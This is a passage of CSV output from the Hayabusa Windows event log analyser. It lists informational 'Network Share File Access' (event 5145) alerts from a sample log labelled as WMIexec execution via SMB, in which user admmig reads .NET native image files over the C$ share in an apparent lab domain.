+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# : IP Address: 